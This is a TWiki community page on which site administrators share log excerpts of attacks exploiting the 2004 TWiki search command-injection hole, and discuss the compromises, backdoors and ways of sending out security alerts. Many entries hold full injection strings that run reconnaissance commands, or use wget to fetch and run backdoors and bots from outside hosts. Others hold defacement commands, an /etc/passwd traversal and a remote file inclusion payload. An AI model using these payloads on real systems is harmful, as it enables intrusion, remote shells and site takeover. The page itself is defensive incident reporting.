194.102.131.10 - - [21/Nov/2004:02:47:03 +0100] "GET /twiki/bin/view/Motion/WebSearch?search=doesnotexist1%27%3B+%28cd+%2Ftmp+%3B+wget+www.adformacion.com%2Fzbind+%3B+chmod+777+x++%2Ftmp%2Fzbind+%3B+%2Ftmp%2Fzbind%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 12241 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebSearch?CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde&CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 


201.8.172.160 - - [21/Nov/2004:17:50:37 +0100] "GET /twiki/bin/view/Motion/WebHome HTTP/1.1" 200 24235 "http://www.google.com.br/search?hl=pt-BR&q=allinurl%3A.twiki+site%3A.dk&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:39 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:40 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:42 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:56 +0100] "GET /twiki/bin/search/Motion/SearchResult?CGISESSID=c78fdb9a34f25de346ea657d763341d6&search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5162 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 

Damage Done

None. I was lucky being on the developers mailing list getting a very early warning.

As one can see, the pattern is clear. These are crackers reading about the exploit, searching for TWiki sites on Google and then trying the exploit exactly as it is reported. And if they succeed - your site is doomed and probably becomming a spam factory.

The developer mailing list is now pretty busy with a lot of traffic. That is great for developers and curious people like me. What we need is a mailing list for security alerts.

-- KennethLavrsen - 21 Nov 2004

Main.BenoitFauvel

At Dreamhost, I notice in my logs the following :

| 18 Nov 2004 - 15:29 | Main.guest | search | Know Main Presentation Sandbox Skin1 TWiki Trash | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |
| 18 Nov 2004 - 15:29 | Main.guest | search | Know Main Presentation Sandbox Skin1 TWiki Trash | doesnotexist1'; (cd /tmp;wget papy.bz/crond;chmod 777 crond) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |
| 18 Nov 2004 - 15:29 | Main.guest | search | Know Main Presentation Sandbox Skin1 TWiki Trash | doesnotexist1'; (/tmp/crond;rm -rf /tmp/crond*) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |
But nothing occurs as it is a very static site.

-- BenoitFauvel - 22 Nov 2004

For more discussion of how best to notify people of security alerts, see BroadcastMessageForAllDownloads and TWikiSecurityAlertProcess.

-- RichardDonkin - 23 Nov 2004

http://freedesktop.org/ was compromised and there's a painful discussion on http://lwn.net. (I also commented on the latest LWN story, still subscriber-only, in which it was officially confirmed it was TWiki.)

We have lost Freedesktop as a well-known user of TWiki, and much security credibility - they are going for MoinMoin. The upshot of all this is that we absolutely must have a low-volume security alert email list that everyone who downloads is encouraged to use, and a TWikiSecurityHome page that is visible on every left bar and has latest vulnerabilities, email list signup, good practices links, etc.

Now that the exploit is actively being used, I think we should also publish the alert to BugTraq and other security alert lists - enough bad guys already know about it, and some of the good guys still have no idea.

Let's continue discussion of process/alerts over on TWikiSecurityAlertProcess, where I've also posted this comment.

-- RichardDonkin - 24 Nov 2004

Yes guys I got severely hacked by phishers who made my site look like PayPal and then sent out emails to come to it and share their login details. Destination of the username/pw was a .ru DNS so it's active organised crime who are exxploiting it - and they have clever rootkits, hide their tracks very well. I only found them because they left a bash history. This was a Twiki which wasn't even linked to a public site (now) but google had a cache I suppose. I wish I had known about the exploit (but an email just arrived so someone found me -sadly shutting stable door a little too late.

Tim King

-- TimKing - 28 Nov 2004

Jeez, it would be nice maybe to put a note to some places like LWN.NET? A quick perusal there shows security alerts for Apache and MoinMoin, bint hint. It isn't just for the Kernel...

Well, I apparently got hacked, it doesn't look like they got out of the web server account, or even like they hacked the pages, but they left something called "/tmp/bind" running, and a shell, probably it was spamming or something. It also looks as though they grabbed the .htpasswd files, and poked around. -- TomOehser

-- TomOehser - 28 Nov 2004

My site at www.ecc.lu got hacked as well, but I think no root access was obtained (all the files I found belonged to the apache user, and the MD5 of the important binaries are unchanged). The following programs were installed: /var/tmp/.bash/mech /tmp/.psy/antrojan.pl (mimicks inetd in perl) /tmp/bd (PsychoTropia backdoor)

A number of IRC connections to dana.basefreak.nl and moya.chello.no were active.

I've gathered whatever information was available in the logs (like IP addresses etc.).

Stefaan Eeckels

-- StefaanEeckels - 28 Nov 2004

LWN posted a Gentoo security alert for TWiki already, so in that sense it's covered. It would be good to have a well defined list of sites such as LWN to notify, as well as email lists. Do comment over on TWikiSecurityAlertProcess.

-- RichardDonkin - 28 Nov 2004

I patched the TWiki on my main site as soon as I got the original notice, and until today hadn't thought much about it. Then I stumbled on a second notice (that Yahoo's spam filter had caught by the way, so many people may have missed it because of spam filters seeing it as spam) and thought I'd check the logs. My host only lets me see one day's worth of log file (and I haven't bothered trying to capture more - though I might now), but I see three attempts in yesterday's log file alone:

200-206-164-44.dsl.telesp.net.br - - [27/Nov/2004:00:39:18 -0600] "GET /twiki/bin/search//?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 404 877 "-" "-"
topsecret.pre-tel.dk - - [27/Nov/2004:03:44:08 -0600] "GET /cgi-bin/twiki/bin/search/Main/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
200.157.134.2 - - [27/Nov/2004:11:30:53 -0600] "GET /cgi-bin/twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28cd+%2Ftmp%3Bwget+merosdetalhes.bluehosting.com.br%2Fcgixc%3B+chmod+777+cgixc%3B+.%2Fcgixc%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 500 604 "http://www.bluedonkey.org/cgi-bin/twiki/bin/view/TWiki/WebSearch" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"

The second one seems to have been run manually from a browser (there are log entries for the image files etc in the results page). The other two do not appear in the log file after the search submission, so I assume that they were scripts that were not interested in graphics files wink

The last one of the three is attempting to download the PsychoPhobia Backdoor (the URL it wgets is still live for those that want to look at this binary, and a little search on the web will reveal the source too). This is a little backdoor that will listen on port 44464 - check on any servers you run that this port is not in use (netstat -a --inet) and even better block it (and all other ports you do not need) in your firewall rules. When running, anybody can telnet to that port for shell access to your box.

-- JohnGordon - 28 Nov 2004

Fortunately, I had previously restricted access to search on my sites at http://edumacation.com and http://cageyconsumer.com thwarting several hack attempts. Check http://edumacation.com/TwikiSecuritySearchRemoteExecuteExploit for the log entries.

-- EliMantel - 28 Nov 2004

Two more attempts in yesterday's logs:

212.110.91.61 - - [28/Nov/2004:09:37:37 -0600] "GET /cgi-bin/twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28cd+%2Fdev%2Fshm%3Bwget+aleks-exploits.com%2Famech.tgz%3Btar+zxvf+amech1.tgz%3Bcd+.amech%3B.%2Fsh%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 500 604 "http://www.bluedonkey.org/cgi-bin/twiki/bin/view/TWiki/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
roub.net - - [28/Nov/2004:12:31:10 -0600] "GET /twiki/bin/search/Main/SearchResult?search=doesnotexist1'%3B+(uname%20-a)+%7C+sed+'s%2F%5C(.*%5C)%2F__BEGIN__%5C1__END__.txt%2F'%3B+fgrep+-i+-l+--+'doesnotexist2 HTTP/1.0" 404 877 "-" "Links (0.99; Linux 2.7.1-fake i686; 128x48)"

-- JohnGordon - 29 Nov 2004

I have gotten a ton of these, starting on 18 Nov 2004 in my TWiki log...here is a sample. God Know ... are my webs. Root seems sound.

I reported this to UCSD, and they say they discovered a hack themselves and fixed it already. Don't know how to report to the ip address providers...anyone know how?

| 18 Nov 2004 - 16:12 | Main.TWikiGuest | search | God Know Main Mtm Plugins RDR Saiyan Snarf TWiki Trash | doesnotexist1'; (u
name -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |

Here's some others, with just the search string. The r0nin virus was running when I found the hack.

doesnotexist1'; (cd /var/tmp;wget http://sixth.ucsd.edu/ks/bd/r0nin;
chmod 777 r0nin;./r0nin) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.162.230.113 |

Here's one where they tried (unsuccessfully) to deface the homepage

doesnotexist1'; (cd /home/httpd/twiki;rm index.html) | sed 's/\(.*\)
/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.162.230.113 |
...
doesnotexist1'; (cd /home/httpd/twiki; wget http://sixth.ucsd.edu/ks
/default.htm) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.162.230.113 |

Here are some others...including the bind and cgi.zip hacks which were also running.

doesnotexist1'; (cd /home/httpd/;echo "DaemonOptik" |tee index.html;ls) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.167.247.101 |

doesnotexist1'; (cd /var/tmp;wget http://dt-lan.972location.com/dc; chmod 775 dc;./dc 200.167.247.101 80) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.167.247.101 |

doesnotexist1'; (cd /tmp;mkdir " ";cd " ";wget home.no/yassir/http; chmod +777 http;perl http;ps -x) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 62.179.217.45 |

doesnotexist1'; (cd /tmp ; wget members.lycos.co.uk/spakk/bind ; chmod 777 bind ; ./bind) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.212.71 | 

doesnotexist1'; (cd /tmp;wget http://www.putz1.hpgvip.ig.com.br/cgi.zip;chmod 4777 cgi.zip;./cgi.zip) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.217.110.105 |


One of my sourceforge.net installations was attacked. here are the logs:

| 22 Nov 2004 - 10:51 | Main.TWikiGuest | search | Main | nonexistantttt' ; (uname -a ; id) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt |
| 22 Nov 2004 - 10:51 | Main.TWikiGuest | search | Main | nonexistantttt' ; (uname -a ; id) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt |                                                                
| 22 Nov 2004 - 10:51 | Main.TWikiGuest | search | Main | nonexistantttt' ; (uname -a ; id) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt | 84.135.237.222 |                                                                
| 22 Nov 2004 - 10:55 | Main.TWikiGuest | search | Main | nonexistantttt' ; (df -h) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt | 84.135.237.222 |
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                              
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (wget) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                              
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (wget) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                                      
| 23 Nov 2004 - 06:56 | Main.TWikiGuest | search | Main | doesnotexist1'; (cd /tmp;wget members.lycos.co.uk/spakk/bind) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                              
| 23 Nov 2004 - 06:56 | Main.TWikiGuest | search | Main | doesnotexist1'; (cd /tmp;wget members.lycos.co.uk/spakk/bind) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                               

-- RafaelAlvarez - 29 Nov 2004

They wiped my entire Main web on siebconsulting.org, and tried to wipe all of my virtualhosts... luckily www didn't have write access to those directories..Except, of course, to the twiki one.. :-/

But the attacks all look similar to the ones on here... the doesnotexist1';etc'doesnotexist2 | blah|

In my case, they were all from South America. Oh well. I needed to upgrade TWiki anyway, right? smile

-- GlennSieb - 01 Dec 2004

-- GlennSieb - 01 Dec 2004

This link and its associated link might be helpful for people needing more information on how to interpret (in general) log entries - http://www.aota.net/Stats/rawlog.php4

-- SueLocke - 3 Dec 2004

Got hacked by bunch that seemed to be from UK.

Put in a defaced index page but didn't seem to do any serious damage, signs of trying to set up IRC using stuff in /tmp, but wiped machine and have upgraded to 02Sep2004 without any significant problems. Can't help with log files as after a brief scan to make sure we hadn't been doing things to other machines locally I wiped everything in order to get machine back up as quickly as possible.

-- TimKirk - 03 Dec 2004

My site has only been operating since 3 December. It still has only a dozen or so users, and I certainly have made no attempt to get it on search engines. I installed the fix within hours of receiving the email on 28 November. I still got hacked:

grep _BEGIN_ access_log :

201.9.36.147 - - [28/Nov/2004:23:16:29 -0700] "GET /twiki/bin/view/TWiki/WebSearch?search=doesnotexist1%27%3B+%28+uname+-a+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11852 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.36.147 - - [28/Nov/2004:23:16:31 -0700] "GET /twiki/bin/view/TWiki/%USERLAYOUTURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebSearch?search=doesnotexist1%27%3B+%28+uname+-a+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.36.147 - - [28/Nov/2004:23:16:31 -0700] "GET /twiki/bin/view/TWiki/%USERSTYLEURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebSearch?search=doesnotexist1%27%3B+%28+uname+-a+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.223.203.50 - - [29/Nov/2004:14:12:27 -0700] "GET /twiki/bin/search/Courses/?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 200 4196 "-" "-"
194.102.131.11 - - [30/Nov/2004:17:23:29 -0700] "GET /twiki/bin/view/Courses/WebSearch?search=doesnotexist1%27%3B+%28ls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11255 "http://zillion.philosophy.arizona.edu/twiki/bin/view/Courses/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.11 - - [30/Nov/2004:17:23:31 -0700] "GET /twiki/bin/view/Courses/%USERLAYOUTURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/Courses/WebSearch?search=doesnotexist1%27%3B+%28ls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.11 - - [30/Nov/2004:17:23:31 -0700] "GET /twiki/bin/view/Courses/%USERSTYLEURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/Courses/WebSearch?search=doesnotexist1%27%3B+%28ls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
213.140.17.96 - - [02/Dec/2004:05:29:11 -0700] "GET /twiki/bin/search/TWiki/SearchResult?search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Buptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 4607 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"

I haven't been able to find any traces, but my machine stopped serving the TWiki yesterday and locked up term and X access. After rebooting, everything appears normal. Today I switched from the original patch to the one suggested by ChapmanFlack.

-- ShaughanLavine - 03 Dec 2004

dplinux.org got hacked, I saw a backdoor installed, a telnet deamon, two programs zero and zbind on which I could not find information. I run chkrootkit and it looks like I am clean. Anyone would kindly point me to documentation on how to check the MD5s? I am really doing this for fun and this is no fun, so I think I will close down the site. Let's see if I can attach the log for dplinux.org

-- AntonioPiccolboni - 05 Dec 2004

Sure - there are MD5s available for most revisions - see the TWikiReleaseTrackerPlugin - the releases.md5 file contains all MD5s for all releases.

However, once a hacker is in I'd be surprised if they leave any trace in TWiki. I'd hazard that you need to do diagnostics on Linux instead.

Best of luck.

-- MartinCleaver - 05 Dec 2004

While the system has been restored, dplinux.org has been taken off line indefinitely until a new home is found -- which has proven difficult. It was the first match in the google search "digital photography linux" and had 3000 visits per month. Unfortunately the type of vulnerability makes me very unconfortable about running twiki again -- I am not so convinced by the patch either, quoting is a difficult art and should be avoided unless shell interpretation is necessary.

-- AntonioPiccolboni - 11 Dec 2004

Antonio, it's not a guaranteed protection, but if you GoogleYourTWiki and delete/move/rename the search cgi you take out the primary attack vector. This would give you time and breathing room to assess the progress/quality of the upcoming twiki code security audit.

There are still potential issues from registered users misusing embedded %SEARCH% constructs, but that is a whole different class of problem.

-- MattWilkie - 12 Dec 2004

Found the following in my logfiles today:

| 09 Jan 2005 - 01:13 | Main.TWikiGuest | search | TWiki | doesnotexist1; (uname -a) | sed s/\(.*\)/__BEGIN__\1__END__.txt/; fgrep -i -l -- doesnotexist2  | 200.225.194.49 |

200.225.194.49 resolves to 225-194-049.ctbctelecom.com.br, i.e. a Brazilian provider. The HTTP referrer of the hacking attempt looks like this:

http://www.google.com.br/search?q=allinurl:*.de*/*twiki&num=100&hl=pt-BR&lr=&start=100&sa=N

So someone was using Google Brazil to search all TWiki installations in Germany. This query lists more than 200000 results. I don't think I was affected since I installed the search patch some time ago, but I'm still checking my site now. Other sites might have been compromised by this mass attack, though.

What do you guys do about such attempts? Do you try to report them to the provider in order to get them investigate the issue?

-- ClausBrod - 09 Jan 2005

I've generally not had any luck reporting hack or probe attempts, logged by my firewall, to ISPs. I usually just ignore these - if the cracker has any clue they'll be in an Internet cafe or using a compromised PC, so there's no way to trace them anyway even if the ISP did take action.

-- RichardDonkin - 09 Jan 2005

I was first hit by this in Dec 2004, and did a post-mortem (see the results in plain english, including all commands run (parsed from referrer logs), and subsequent backdoor compiled and installed as /dev/shm/rs.zip ). Just yesterday (2 Feb 2005) my referrer logs showed another (luckily, unsucessful) attack. I reeeally hope everyone out there has got this patched by now.....

-- MichaelNielsen - 04 Feb 2005

Thanks for sharing your abridged and eminently readable exploit story. BTW, at the end you mention a yearning for a java-based twiki, have you seen TWikiVsXWiki? It follows a lot of the twiki conventions, or at least it used to. It is becoming more and more divergent as development progresses.

-- MattWilkie - 04 Feb 2005

This is slightly off topic but I didn't have anywhere better to post it:

I found this in my log today...

213.130.26.7 - - [07/Apr/2005:22:36:32 +0200] "POST /twiki/bin/view/Main/WebHome?rev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 55749 "http://www.google.com/" "Java/1.4.2_01"
213.130.26.7 - - [07/Apr/2005:22:36:41 +0200] "POST /twiki/bin/view/Main/WebHome?rev=http://fluster1.narod.ru/check.txt HTTP/1.0" 200 55962 "http://www.google.com/" "Java/1.4.2_01"

(incase they take it down or move it)

http://fluster1.narod.ru/check.txt contains:

<?
print "<font size='+3' color='red'>";
$cmd="echo itisvulnerable";
print "<b>PassThru</b> : ";
PassThru($cmd);
print "<br><b>System</b> : ";
system($cmd);
print "<br><b>Exec</b> : ";
exec($cmd);
?>
and http://fluster1.narod.ru : has scull and bones image

and the tile says "Owned_by_p4r4Z!73"

This was also in the page:

<script language="JavaScript" src="http://bs.yandex.ru/show/163"></script>
<!-- mailto:spm111@yandex.ru -->

I don't know if this information is useful but I wanted to report it anyway.

-- TravisBarker - 07 Apr 2005

Topic attachments
I Attachment History Action Size Date Who Comment
Unknown file formatEXT log r1 manage 10.1 K 2004-12-05 - 08:21 AntonioPiccolboni dplinux.org
Edit | Attach | Watch | Print version | History: r34 < r33 < r32 < r31 < r30 | Backlinks | Raw View | Raw edit | More topic actions
Topic revision: r34 - 2005-04-07 - TravisBarker
 
  • Learn about TWiki  
  • Download TWiki
This site is powered by the TWiki collaboration platform Powered by Perl Hosted by OICcam.com Ideas, requests, problems regarding TWiki? Send feedback. Ask community in the support forum.
Copyright © 1999-2017 by the contributing authors. All material on this collaboration platform is the property of the contributing authors.